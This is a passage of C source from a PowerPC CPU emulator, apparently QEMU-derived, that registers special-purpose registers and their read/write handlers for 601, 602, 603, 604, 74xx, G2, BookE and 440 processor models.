    spr_register_kvm_hv(env, SPR_UAMOR, "UAMOR",
                        SPR_NOACCESS, SPR_NOACCESS,
                        &spr_read_generic, &spr_write_uamor,
                        &spr_read_generic, &spr_write_generic,
                        KVM_REG_PPC_UAMOR, 0);
    spr_register_hv(env, SPR_AMOR, "AMOR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0);
}

static void gen_spr_iamr(CPUPPCState *env)
{
    spr_register_kvm_hv(env, SPR_IAMR, "IAMR",
                        SPR_NOACCESS, SPR_NOACCESS,
                        &spr_read_generic, &spr_write_iamr,
                        &spr_read_generic, &spr_write_generic,
                        KVM_REG_PPC_IAMR, 0);
}
#endif /* TARGET_PPC64 */

static void spr_read_thrm(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_fixup_thrm(tcg_ctx, tcg_ctx->cpu_env);
    gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn);
    spr_load_dump_spr(tcg_ctx, sprn);
}

static void gen_spr_thrm(CPUPPCState *env)
{
    /* Thermal management */
    /* XXX : not implemented */
    spr_register(env, SPR_THRM1, "THRM1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_thrm, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_THRM2, "THRM2",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_thrm, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_THRM3, "THRM3",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_thrm, &spr_write_generic,
                 0x00000000);
}

/* SPR specific to PowerPC 604 implementation */
static void gen_spr_604(CPUPPCState *env)
{
    /* Processor identification */
    spr_register(env, SPR_PIR, "PIR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_pir,
                 0x00000000);
    /* Breakpoints */
    /* XXX : not implemented */
    spr_register(env, SPR_IABR, "IABR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register_kvm(env, SPR_DABR, "DABR",
                     SPR_NOACCESS, SPR_NOACCESS,
                     &spr_read_generic, &spr_write_generic,
                     KVM_REG_PPC_DABR, 0x00000000);
    /* Performance counters */
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_MMCR0, "MMCR0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC1, "PMC1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_PMC2, "PMC2",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_7XX_SIAR, "SIAR",
                 SPR_NOACCESS,
SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_SDA, "SDA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 603 implementation */ static void gen_spr_603(CPUPPCState *env) { /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC G2 implementation */ static void gen_spr_G2(CPUPPCState *env) { /* Memory base address */ /* MBAR */ /* XXX : not implemented */ spr_register(env, SPR_MBAR, "MBAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Exception processing */ spr_register(env, SPR_BOOKE_CSRR0, "CSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_CSRR1, "CSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DABR2, "DABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR2, "IABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IBCR, "IBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DBCR, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 602 implementation */ static void gen_spr_602(CPUPPCState *env) { /* ESA registers */ /* XXX : not implemented */ spr_register(env, SPR_SER, "SER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_SEBR, "SEBR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_ESASRR, "ESASRR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Floating point status */ /* XXX : not implemented */ spr_register(env, SPR_SP, "SP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_LT, "LT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Watchdog timer */ /* XXX : not implemented */ spr_register(env, SPR_TCR, "TCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Interrupt base */ spr_register(env, SPR_IBR, "IBR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to 
PowerPC 601 implementation */ static void gen_spr_601(CPUPPCState *env) { /* Multiplication/division register */ /* MQ */ spr_register(env, SPR_MQ, "MQ", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); /* RTC registers */ spr_register(env, SPR_601_RTCU, "RTCU", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_601_rtcu, 0x00000000); spr_register(env, SPR_601_VRTCU, "RTCU", &spr_read_601_rtcu, SPR_NOACCESS, &spr_read_601_rtcu, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_601_RTCL, "RTCL", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_601_rtcl, 0x00000000); spr_register(env, SPR_601_VRTCL, "RTCL", &spr_read_601_rtcl, SPR_NOACCESS, &spr_read_601_rtcl, SPR_NOACCESS, 0x00000000); /* Timer */ spr_register(env, SPR_601_UDECR, "UDECR", &spr_read_decr, SPR_NOACCESS, &spr_read_decr, SPR_NOACCESS, 0x00000000); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ spr_register(env, SPR_IBAT0U, "IBAT0U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT0L, "IBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT1U, "IBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT1L, "IBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT2U, "IBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT2L, "IBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT3U, "IBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT3L, "IBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); env->nb_BATs = 4; } static void gen_spr_74xx(CPUPPCState *env) { /* Processor identification */ spr_register(env, SPR_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_74XX_MMCR2, "MMCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_74XX_UMMCR2, "UMMCR2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX: not implemented */ spr_register(env, SPR_BAMR, "BAMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MSSCR0, "MSSCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Altivec */ spr_register(env, SPR_VRSAVE, "VRSAVE", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Not strictly an SPR */ vscr_init(env, 0x00010000); } static void gen_l3_ctrl(CPUPPCState *env) { 
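    /*
     * L3 cache control registers, found on 7450-family parts. The L3
     * cache itself is not modelled; these SPRs act as plain storage.
     */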
/* L3CR */ /* XXX : not implemented */ spr_register(env, SPR_L3CR, "L3CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR0 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR0, "L3ITCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3PM */ /* XXX : not implemented */ spr_register(env, SPR_L3PM, "L3PM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_74xx_soft_tlb(CPUPPCState *env, int nb_tlbs, int nb_ways) { env->nb_tlb = nb_tlbs; env->nb_ways = nb_ways; env->id_tlbs = 1; env->tlb_type = TLB_6XX; /* XXX : not implemented */ spr_register(env, SPR_PTEHI, "PTEHI", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_PTELO, "PTELO", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_TLBMISS, "TLBMISS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void spr_write_e500_l1csr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], L1CSR0_DCE | L1CSR0_CPE); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_e500_l1csr1(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], L1CSR1_ICE | L1CSR1_CPE); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_booke206_mmucsr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke206_tlbflush(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_booke_pid(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_booke_setpid(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_eplc(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke_set_eplc(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_epsc(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke_set_epsc(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void gen_spr_usprg3(CPUPPCState *env) { spr_register(env, SPR_USPRG3, "USPRG3", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); } static void gen_spr_usprgh(CPUPPCState *env) { spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); } /* PowerPC BookE SPR */ static void gen_spr_BookE(CPUPPCState *env, uint64_t ivor_mask) { const char *ivor_names[64] = { "IVOR0", "IVOR1", "IVOR2", "IVOR3", "IVOR4", "IVOR5", "IVOR6", "IVOR7", "IVOR8", "IVOR9", "IVOR10", "IVOR11", "IVOR12", "IVOR13", "IVOR14", "IVOR15", "IVOR16", "IVOR17", "IVOR18", "IVOR19", "IVOR20", "IVOR21", "IVOR22", "IVOR23", "IVOR24", "IVOR25", "IVOR26", "IVOR27", "IVOR28", "IVOR29", "IVOR30", 
"IVOR31", "IVOR32", "IVOR33", "IVOR34", "IVOR35", "IVOR36", "IVOR37", "IVOR38", "IVOR39", "IVOR40", "IVOR41", "IVOR42", "IVOR43", "IVOR44", "IVOR45", "IVOR46", "IVOR47", "IVOR48", "IVOR49", "IVOR50", "IVOR51", "IVOR52", "IVOR53", "IVOR54", "IVOR55", "IVOR56", "IVOR57", "IVOR58", "IVOR59", "IVOR60", "IVOR61", "IVOR62", "IVOR63", }; #define SPR_BOOKE_IVORxx (-1) int ivor_sprn[64] = { SPR_BOOKE_IVOR0, SPR_BOOKE_IVOR1, SPR_BOOKE_IVOR2, SPR_BOOKE_IVOR3, SPR_BOOKE_IVOR4, SPR_BOOKE_IVOR5, SPR_BOOKE_IVOR6, SPR_BOOKE_IVOR7, SPR_BOOKE_IVOR8, SPR_BOOKE_IVOR9, SPR_BOOKE_IVOR10, SPR_BOOKE_IVOR11, SPR_BOOKE_IVOR12, SPR_BOOKE_IVOR13, SPR_BOOKE_IVOR14, SPR_BOOKE_IVOR15, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVOR32, SPR_BOOKE_IVOR33, SPR_BOOKE_IVOR34, SPR_BOOKE_IVOR35, SPR_BOOKE_IVOR36, SPR_BOOKE_IVOR37, SPR_BOOKE_IVOR38, SPR_BOOKE_IVOR39, SPR_BOOKE_IVOR40, SPR_BOOKE_IVOR41, SPR_BOOKE_IVOR42, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, }; int i; /* Interrupt processing */ spr_register(env, SPR_BOOKE_CSRR0, "CSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_CSRR1, "CSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Debug */ /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR0, "DBCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR1, "DBCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR2, "DBCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR0, "DSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR1, "DSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, 0x00000000); spr_register(env, SPR_BOOKE_DEAR, "DEAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_ESR, "ESR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_IVPR, 
"IVPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_excp_prefix, 0x00000000); /* Exception vectors */ for (i = 0; i < 64; i++) { if (ivor_mask & (1ULL << i)) { if (ivor_sprn[i] == SPR_BOOKE_IVORxx) { fprintf(stderr, "ERROR: IVOR %d SPR is not defined\n", i); exit(1); } spr_register(env, ivor_sprn[i], ivor_names[i], SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_excp_vector, 0x00000000); } } spr_register(env, SPR_BOOKE_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); spr_register(env, SPR_BOOKE_TCR, "TCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tcr, 0x00000000); spr_register(env, SPR_BOOKE_TSR, "TSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tsr, 0x00000000); /* Timer */ spr_register(env, SPR_DECR, "DECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_decr, &spr_write_decr, 0x00000000); spr_register(env, SPR_BOOKE_DECAR, "DECAR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_generic, 0x00000000); /* SPRGs */ spr_register(env, SPR_USPRG0, "USPRG0", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_SPRG8, "SPRG8", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_SPRG9, "SPRG9", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static inline uint32_t gen_tlbncfg(uint32_t assoc, uint32_t minsize, uint32_t maxsize, uint32_t flags, uint32_t nentries) { return (assoc << TLBnCFG_ASSOC_SHIFT) | (minsize << TLBnCFG_MINSIZE_SHIFT) | (maxsize << TLBnCFG_MAXSIZE_SHIFT) | flags | nentries; } /* BookE 2.06 storage control registers */ static void gen_spr_BookE206(CPUPPCState *env, uint32_t mas_mask, uint32_t *tlbncfg, uint32_t mmucfg) { const char *mas_names[8] = { "MAS0", "MAS1", "MAS2", "MAS3", "MAS4", "MAS5", "MAS6", "MAS7", }; int mas_sprn[8] = { SPR_BOOKE_MAS0, SPR_BOOKE_MAS1, SPR_BOOKE_MAS2, SPR_BOOKE_MAS3, SPR_BOOKE_MAS4, SPR_BOOKE_MAS5, SPR_BOOKE_MAS6, SPR_BOOKE_MAS7, }; int i; /* TLB assist registers */ /* XXX : not implemented */ for (i = 0; i < 8; i++) { void (*uea_write)(DisasContext *ctx, int sprn, int gprn) = &spr_write_generic32; if (i == 2 && (mas_mask & (1 << i)) && (env->insns_flags & PPC_64B)) { uea_write = &spr_write_generic; } if (mas_mask & (1 << i)) { spr_register(env, mas_sprn[i], mas_names[i], SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, uea_write, 0x00000000); } } if (env->nb_pids > 1) { /* XXX : not implemented */ spr_register(env, SPR_BOOKE_PID1, "PID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); } if (env->nb_pids > 2) { /* XXX : not implemented */ spr_register(env, SPR_BOOKE_PID2, "PID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); } spr_register(env, SPR_BOOKE_EPLC, "EPLC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_eplc, 0x00000000); spr_register(env, SPR_BOOKE_EPSC, "EPSC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_epsc, 
0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MMUCFG, "MMUCFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, mmucfg); switch (env->nb_ways) { case 4: spr_register(env, SPR_BOOKE_TLB3CFG, "TLB3CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[3]); /* Fallthru */ case 3: spr_register(env, SPR_BOOKE_TLB2CFG, "TLB2CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[2]); /* Fallthru */ case 2: spr_register(env, SPR_BOOKE_TLB1CFG, "TLB1CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[1]); /* Fallthru */ case 1: spr_register(env, SPR_BOOKE_TLB0CFG, "TLB0CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[0]); /* Fallthru */ case 0: default: break; } gen_spr_usprgh(env); } /* SPR specific to PowerPC 440 implementation */ static void gen_spr_440(CPUPPCState *env) { /* Cache control */ /* XXX : not implemented */ spr_register(env, SPR_440_DNV0, "DNV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV1, "DNV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV2, "DNV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV3, "DNV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV0, "DTV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV1, "DTV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV2, "DTV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV3, "DTV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DVLIM, "DVLIM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV0, "INV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV1, "INV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV2, "INV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV3, "INV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV0, "ITV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV1, "ITV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV2, "ITV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV3, "ITV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_IVLIM, "IVLIM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, 
                 &spr_write_generic, 0x00000000);
    /* Cache debug */
    /* XXX : not implemented */
    spr_register(env, SPR_BOOKE_DCDBTRH, "DCDBTRH",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_BOOKE_DCDBTRL, "DCDBTRL",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_BOOKE_ICDBDR, "ICDBDR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, SPR_NOACCESS,
                 0x00000000);
    /* XXX : not implemented */
    spr_register(env, SPR_BOOKE_ICDBTRH, "ICDBTRH",
                 SPR_NOACCESS, SPR_NOACCESS,
